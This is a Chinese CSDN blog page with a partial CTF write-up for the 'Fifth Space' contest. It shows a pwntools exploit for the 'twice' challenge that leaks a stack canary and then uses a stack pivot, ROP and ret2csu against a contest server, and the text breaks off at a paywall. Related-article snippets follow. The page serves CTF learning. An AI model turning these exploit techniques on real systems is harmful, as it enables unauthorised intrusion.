第五空间 部分题解

最新推荐文章于 2022-09-26 14:13:16 发布
最新推荐文章于 2022-09-26 14:13:16 发布
阅读量842 收藏
点赞数
分类专栏: CTF WriteUp 文章标签: 5space unlink
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44145820/article/details/106974879
版权
这篇博客主要探讨了第五空间的PWN题目,包括twice题目中栈迁移和ret2csu的技术,以及pwnme通过修改GOT表的unlink方法。此外,还提到了在of题目中遇到的远程与本地文件不一致导致的UAF问题。在RE部分,博主分析了一个类似reverse.kr的replace程序,涉及anti-debug技巧和关键地址的patch操作,以逆向工程思路求解flag。
摘要由CSDN通过智能技术生成

目录

PWN

twice(栈迁移,ret2csu)

第一次先泄露出canary和rbp地址
第二次栈迁移+ROP,先puts泄露出libc,然后ret2csu把新的ROPchain读进来

from pwn import *
from LibcSearcher import *

r = remote("121.36.59.116", 9999)
#r = process("./twice/pwn")
context(arch='amd64', os='linux', log_level='debug')
DEBUG = 0
if DEBUG:
	gdb.attach(r,
	'''
	b *0x400844
	b *0x40087A
	b *0x40091A
	c
	''')
elf = ELF("./twice/pwn")
read_got = elf.got['read']
puts = elf.plt['puts']
pop_rdi = 0x400923
leave = 0x400879
csu1 = 0x40091A
csu2 = 0x400900
ret = 0x40087A

r.recvuntil(">")
r.send('a'*89)
r.recvuntil('a'*89)
canary = u64('\x00' + r.recv(7))
rbp = u64(r.recvuntil('\x7f').ljust(8, '\x00'))
buf = rbp - 0x70
success("canary:"+hex(canary))
success("rbp:"+hex(rbp))
r.recvuntil(">")
payload = p64(pop_rdi) + p64(read_got) + p64(puts)
payload += p64(csu1) + p64(0) + p64(1) + p64(read_got) + p64(0x1000) + p64(rbp) + p64(0) + p64(csu2)
payload = payload.ljust(88, 'a') + p64(canary) + p64(buf-8) + p64(leave)
r.send(payload)
r.recvuntil('\n')
read_addr
最低0.47元/天 解锁文章
L.o.W
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020 第五空间大赛--RE题解
菜鸡的博客
07-11 704
2020 第五空间大赛–RE题解 ManageCode net+MFC的逆向,od好像没法调试(刚载入就运行了,哪个师傅会od调试请教教我) dnspy载入,搜索字符串定位主函数 随后可以打断点调试,跟进if里面的check函数可以找到这里 长度以及格式的验证 FormChk返回后定位到这里 这里有一个chk_344函数,但无法跟进去,双击后找到这个函数 我们需要找到这两个号函数的偏移 随后我们选择用ida载入这个程序,选择第二个以普通pe文件解析 然后找到对应的地址之后就可以f5查看函数逻辑了
第五空间ctf2020pwn-twice
qq_36495104的博客
06-25 627
checsec ida main函数 int __cdecl main(int argc, const char **argv, const char **envp) { for ( nCount = InitData(); (unsigned int)sub_4007A9(nCount); ++nCount ) ; return 0; } sub_4007A9函数 // a1=ncount __int64 __fastcall sub_4007A9(int a1) { unsign
第五空间CTF初赛WriteUp By EDISEC
qq_45603443的博客
09-26 1576
第五空间CTF初赛WriteUp By EDISEC
[第五空间]re nop题目详解
ytj00的博客
07-08 317
[第五空间]nop 第一次写这种题,看网上其他大佬的代码处理有点晕,这里提供一种不同的思路(xky太强了) ida打开,发现f5反编译的代码太诡异,直接输入完东西后就跳地址,应该是用了花指令什么的来混淆,所以直接看汇编代码 我们从最开的输入一步步分析, 这里OFFSET是将数值回送变量或标号的偏移地址值,所以意味着我们这里是要输入数字的(从%d也可以看出) 然后把我们的输入给了number(这个number是我自己改的,方便看) 然后按照程序顺序来看, number给了eax,eax自加一,然后跳到lo
第五空间sctf之re之nop复现
weixin_47158947的博客
07-12 192
标题 这里写自定义目录标题标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何
第五次上机题解1
08-03
同时,使用数组来存储和处理数据,避免了空间的浪费。 B. Hanoi塔 (solution by prime21) Hanoi塔是一个经典的递归问题。它要求将一个柱子上的所有圆盘按照大小顺序移动到另一个柱子上,每次只能移动一个圆盘,并且...
第五次练习赛题解1
08-03
【第五次练习赛题解1】是一道编程题目,主要涉及了数组操作、排序以及一些基本的数学运算。下面将详细解析题目所涵盖的知识点。 首先,程序中使用了`qsort()`函数,这是C语言标准库`<stdlib.h>`中的一个函数,用于...
python-leetcode面试题解之第54题螺旋矩阵-题解.zip
03-19
5. **复杂度分析**:讨论时间复杂度和空间复杂度,解释代码在面对不同规模输入时的效率。 6. **拓展讨论**:可能包括其他语言的实现,或者对类似问题的解法,以及可能遇到的陷阱和注意事项。 为了深入理解螺旋矩阵...
python-leetcode面试题解之第61题旋转链表-题解.zip
最新发布
03-19
2. **两次遍历**:更高效的方法是先找到链表的长度n,然后找到新的链表头(即原链表的第(k % n + 1)个节点),接着断开链表,将前半部分连接到后半部分的末尾。这种方法的时间复杂度为O(n)。 下面是第二种策略的...
2020年第五空间.zip
07-20
2020年第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp。
第五空间部分Writeup
SkYe's Blog
06-26 617
twice 分析 保护情况 Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 漏洞函数 程序一共有两次输入的机会,第一次输入长度为 0x50+9 ;第二次输入长度为:0x50+0x20 。存储字符串的变量 s 距离 rbp 是 0x60 ,也就是第二次输入是溢出,溢出长度仅可覆盖 rip 。 输入处理函数: __
re学习笔记(66)第五空间智能安全大赛-re-nop
逆向随笔
06-25 671
打开老多花指令 挨个把这样的替换掉就好了 点击push的地址,ctrl+c复制。点击jmp ebp使用插件ctrl+alt+k修改,修改为jmp <复制的地址> 搜了一下字符串找到输出正确与否的代码,发现没有跳到Right的代码,,Right上面的那个jmp跳过了他,,, 刚开始以为是要修改main函数最底部顶的数值,让他等于Right的地址,然后pop ebx赋值给ebx,最后jmp ebx跳转到Right 调试了半天这里什么都没有! 整个main函数就是对表面上的,对输入的数Num+3
第五空间Writeup_Web
Lethe's Blog
09-03 1130
空相 (1)进入页面,提示了参数id (2)尝试一下:?id=1‘ (3)
离散数学 第十二章 平面图及其应用
xiaoxiao20020505的博客
02-25 6204
1.平面图:若能把一个无向图G的所有结点和边画在平面上,使得任何两边除公共结点外没有其他交叉点。 2.对偶图 3.库拉托夫斯基定理 4.四色问题 12.1 平面图的基本概念 ※面的定义:G的图形中由边围成的一个封闭区域,不能再分割成子区域。 *面r的边数——>面的度,记D(r) 有限面=内部面 无限面=外部面 !!割边只能是一个面的边界 12.2 欧拉公式 定理1:设G=<V,E>是连通平面图,若它有n个结点,m条边和f个面,则有n-m+f=2 定理2:设G是一个(n
第五空间web复现
unexpectedthing的博客
09-27 743
@[]
第五空间writeup-str4nge
wyj_1216 House
08-28 1362
web 空相 进入后: 尝试:id = 1 再次尝试:id = 1 and 1 = 1 尝试读取上面的php文件:25d99be830ad95b02f6f82235c8edcf7.php 发现token 于是: http://111.33.164.4:10001/25d99be830ad95b02f6f82235c8edcf7.php?token=1DJBAAA03PNLD02GJ2S1M...
2020第五空间 web writeup
a3320315的博客
06-27 3364
hate-php 源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
2021第五空间CTF_web_wp
meteox的博客
09-20 2245
web WebFTP 这个开始时有个1.txt直接访问,里面就有包括flag等的各种环境信息,不知道是忘删了还是有师傅导出的、、、 这个程序直接GitHub上可以找到源代码,里面有个php探针,这就可以得到各种信息了 https://github.com/wifeat/WebFTP/blob/master/Readme/mytz.php 在phpinfo中可以得到flag http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo pkloveclou
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值